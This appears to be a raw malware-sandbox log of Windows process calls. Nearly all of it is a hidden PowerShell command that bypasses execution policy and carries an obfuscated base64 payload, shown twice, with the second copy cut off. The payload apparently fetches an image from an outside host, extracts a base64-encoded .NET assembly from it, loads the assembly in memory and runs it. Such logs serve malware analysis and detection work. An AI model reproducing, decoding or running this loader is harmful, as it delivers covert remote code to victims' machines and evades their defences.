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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('oUfwwBJMv','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002fc
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -command "$Codigo = 'JoUfwwBJMvBpoUfwwBJMvG0oUfwwBJMvYQBnoUfwwBJMvGUoUfwwBJMvVQByoUfwwBJMvGwoUfwwBJMvIoUfwwBJMvoUfwwBJMv9oUfwwBJMvCoUfwwBJMvoUfwwBJMvJwBooUfwwBJMvHQoUfwwBJMvdoUfwwBJMvBwoUfwwBJMvHMoUfwwBJMvOgoUfwwBJMvvoUfwwBJMvC8oUfwwBJMvaQBtoUfwwBJMvGEoUfwwBJMvZwBloUfwwBJMvHUoUfwwBJMvcoUfwwBJMvBsoUfwwBJMvG8oUfwwBJMvYQBkoUfwwBJMvC4oUfwwBJMvaQBvoUfwwBJMvC8oUfwwBJMvaQBioUfwwBJMvC8oUfwwBJMvdwBzoUfwwBJMvDgoUfwwBJMvTQBBoUfwwBJMvEooUfwwBJMvNgBloUfwwBJMvHoUfwwBJMvoUfwwBJMvdoUfwwBJMvBpoUfwwBJMvEwoUfwwBJMvZgBHoUfwwBJMvHUoUfwwBJMvXwoUfwwBJMvxoUfwwBJMvDYoUfwwBJMvOQoUfwwBJMv3oUfwwBJMvDcoUfwwBJMvMwoUfwwBJMv4oUfwwBJMvDQoUfwwBJMvOQoUfwwBJMvyoUfwwBJMvC4oUfwwBJMvagBwoUfwwBJMvGcoUfwwBJMvJwoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvdwBloUfwwBJMvGIoUfwwBJMvQwBsoUfwwBJMvGkoUfwwBJMvZQBuoUfwwBJMvHQoUfwwBJMvIoUfwwBJMvoUfwwBJMv9oUfwwBJMvCoUfwwBJMvoUfwwBJMvTgBloUfwwBJMvHcoUfwwBJMvLQBPoUfwwBJMvGIoUfwwBJMvagBloUfwwBJMvGMoUfwwBJMvdoUfwwBJMvoUfwwBJMvgoUfwwBJMvFMoUfwwBJMveQBzoUfwwBJMvHQoUfwwBJMvZQBtoUfwwBJMvC4oUfwwBJMvTgBloUfwwBJMvHQoUfwwBJMvLgBXoUfwwBJMvGUoUfwwBJMvYgBDoUfwwBJMvGwoUfwwBJMvaQBloUfwwBJMvG4oUfwwBJMvdoUfwwBJMvoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvaQBtoUfwwBJMvGEoUfwwBJMvZwBloUfwwBJMvEIoUfwwBJMveQB0oUfwwBJMvGUoUfwwBJMvcwoUfwwBJMvgoUfwwBJMvD0oUfwwBJMvIoUfwwBJMvoUfwwBJMvkoUfwwBJMvHcoUfwwBJMvZQBioUfwwBJMvEMoUfwwBJMvboUfwwBJMvBpoUfwwBJMvGUoUfwwBJMvbgB0oUfwwBJMvC4oUfwwBJMvRoUfwwBJMvBvoUfwwBJMvHcoUfwwBJMvbgBsoUfwwBJMvG8oUfwwBJMvYQBkoUfwwBJMvEQoUfwwBJMvYQB0oUfwwBJMvGEoUfwwBJMvKoUfwwBJMvoUfwwBJMvkoUfwwBJMvGkoUfwwBJMvbQBhoUfwwBJMvGcoUfwwBJMvZQBVoUfwwBJMvHIoUfwwBJMvboUfwwBJMvoUfwwBJMvpoUfwwBJMvDsoUfwwBJMvJoUfwwBJMvBpoUfwwBJMvG0oUfwwBJMvYQBnoUfwwBJMvGUoUfwwBJMvVoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvdoUfwwBJMvoUfwwBJMvgoUfwwBJMvD0oUfwwBJMvIoUfwwBJMvBboUfwwBJMvFMoUfwwBJMveQBzoUfwwBJMvHQoUfwwBJMvZQBtoUfwwBJMvC4oUfwwBJMvVoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvdoUfwwBJMvoUfwwBJMvuoUfwwBJMvEUoUfwwBJMvbgBjoUfwwBJMvG8oUfwwBJMvZoUfwwBJMvBpoUfwwBJMvG4oUfwwBJMvZwBdoUfwwBJMvDooUfwwBJMvOgBVoUfwwBJMvFQoUfwwBJMvRgoUfwwBJMv4oUfwwBJMvC4oUfwwBJMvRwBloUfwwBJMvHQoUfwwBJMvUwB0oUfwwBJMvHIoUfwwBJMvaQBuoUfwwBJMvGcoUfwwBJMvKoUfwwBJMvoUfwwBJMvkoUfwwBJMvGkoUfwwBJMvbQBhoUfwwBJMvGcoUfwwBJMvZQBCoUfwwBJMvHkoUfwwBJMvdoUfwwBJMvBloUfwwBJMvHMoUfwwBJMvKQoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEYoUfwwBJMvboUfwwBJMvBhoUfwwBJMvGcoUfwwBJMvIoUfwwBJMvoUfwwBJMv9oUfwwBJMvCoUfwwBJMvoUfwwBJMvJwoUfwwBJMv8oUfwwBJMvDwoUfwwBJMvQgBBoUfwwBJMvFMoUfwwBJMvRQoUfwwBJMv2oUfwwBJMvDQoUfwwBJMvXwBToUfwwBJMvFQoUfwwBJMvQQBSoUfwwBJMvFQoUfwwBJMvPgoUfwwBJMv+oUfwwBJMvCcoUfwwBJMvOwoUfwwBJMvkoUfwwBJMvGUoUfwwBJMvbgBkoUfwwBJMvEYoUfwwBJMvboUfwwBJMvBhoUfwwBJMvGcoUfwwBJMvIoUfwwBJMvoUfwwBJMv9oUfwwBJMvCoUfwwBJMvoUfwwBJMvJwoUfwwBJMv8oUfwwBJMvDwoUfwwBJMvQgBBoUfwwBJMvFMoUfwwBJMvRQoUfwwBJMv2oUfwwBJMvDQoUfwwBJMvXwBFoUfwwBJMvE4oUfwwBJMvRoUfwwBJMvoUfwwBJMv+oUfwwBJMvD4oUfwwBJMvJwoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEkoUfwwBJMvbgBkoUfwwBJMvGUoUfwwBJMveoUfwwBJMvoUfwwBJMvgoUfwwBJMvD0oUfwwBJMvIoUfwwBJMvoUfwwBJMvkoUfwwBJMvGkoUfwwBJMvbQBhoUfwwBJMvGcoUfwwBJMvZQBUoUfwwBJMvGUoUfwwBJMveoUfwwBJMvB0oUfwwBJMvC4oUfwwBJMvSQBuoUfwwBJMvGQoUfwwBJMvZQB4oUfwwBJMvE8oUfwwBJMvZgoUfwwBJMvooUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEYoUfwwBJMvboUfwwBJMvBhoUfwwBJMvGcoUfwwBJMvKQoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvZQBuoUfwwBJMvGQoUfwwBJMvSQBuoUfwwBJMvGQoUfwwBJMvZQB4oUfwwBJMvCoUfwwBJMvoUfwwBJMvPQoUfwwBJMvgoUfwwBJMvCQoUfwwBJMvaQBtoUfwwBJMvGEoUfwwBJMvZwBloUfwwBJMvFQoUfwwBJMvZQB4oUfwwBJMvHQoUfwwBJMvLgBJoUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvTwBmoUfwwBJMvCgoUfwwBJMvJoUfwwBJMvBloUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBGoUfwwBJMvGwoUfwwBJMvYQBnoUfwwBJMvCkoUfwwBJMvOwoUfwwBJMvkoUfwwBJMvHMoUfwwBJMvdoUfwwBJMvBhoUfwwBJMvHIoUfwwBJMvdoUfwwBJMvBJoUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvIoUfwwBJMvoUfwwBJMvtoUfwwBJMvGcoUfwwBJMvZQoUfwwBJMvgoUfwwBJMvDoUfwwBJMvoUfwwBJMvIoUfwwBJMvoUfwwBJMvtoUfwwBJMvGEoUfwwBJMvbgBkoUfwwBJMvCoUfwwBJMvoUfwwBJMvJoUfwwBJMvBloUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBJoUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvIoUfwwBJMvoUfwwBJMvtoUfwwBJMvGcoUfwwBJMvdoUfwwBJMvoUfwwBJMvgoUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEkoUfwwBJMvbgBkoUfwwBJMvGUoUfwwBJMveoUfwwBJMvoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEkoUfwwBJMvbgBkoUfwwBJMvGUoUfwwBJMveoUfwwBJMvoUfwwBJMvgoUfwwBJMvCsoUfwwBJMvPQoUfwwBJMvgoUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEYoUfwwBJMvboUfwwBJMvBhoUfwwBJMvGcoUfwwBJMvLgBMoUfwwBJMvGUoUfwwBJMvbgBnoUfwwBJMvHQoUfwwBJMvaoUfwwBJMvoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvYgBhoUfwwBJMvHMoUfwwBJMvZQoUfwwBJMv2oUfwwBJMvDQoUfwwBJMvToUfwwBJMvBloUfwwBJMvG4oUfwwBJMvZwB0oUfwwBJMvGgoUfwwBJMvIoUfwwBJMvoUfwwBJMv9oUfwwBJMvCoUfwwBJMvoUfwwBJMvJoUfwwBJMvBloUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBJoUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvIoUfwwBJMvoUfwwBJMvtoUfwwBJMvCoUfwwBJMvoUfwwBJMvJoUfwwBJMvBzoUfwwBJMvHQo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